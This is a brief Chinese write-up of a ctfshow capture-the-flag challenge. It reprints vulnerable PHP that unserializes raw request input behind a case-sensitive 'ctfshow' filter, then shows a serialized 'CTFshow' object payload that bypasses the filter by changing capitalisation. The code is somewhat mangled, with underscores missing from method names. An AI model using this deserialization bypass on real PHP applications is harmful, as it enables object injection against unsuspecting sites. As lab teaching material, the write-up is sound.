- 依旧代码审计
```php <?php highlightfile(_FILE);
include(‘flag.php’); $cs = file_get_contents(‘php://input’);
class ctfshow{ public $username=’xxxxxx’; public $password=’xxxxxx’; public function construct($u,$p){ $this->username=$u; $this->password=$p; } public function login(){ return $this->username===$this->password; } public function toString(){ return $this->username; } public function destruct(){ global $flag; echo $flag; } } $ctfshowo=@unserialize($cs); if(preg_match(‘/ctfshow/‘, $cs)){ //如果接收到的序列化字符串中有ctfshow就会抛出异常,不会执行destruct魔术方法 throw new Exception(“Error $ctfshowo”,1); }
2. 可以利用对象名大小写进行绕过```php<?phpclass CTFshow{public $username='xxxxxx';public $password='xxxxxx';}echo serialize(new CTFshow());//O:7:"CTFshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
- 利用工具提交
若有收获,就点个赞吧
0 人点赞
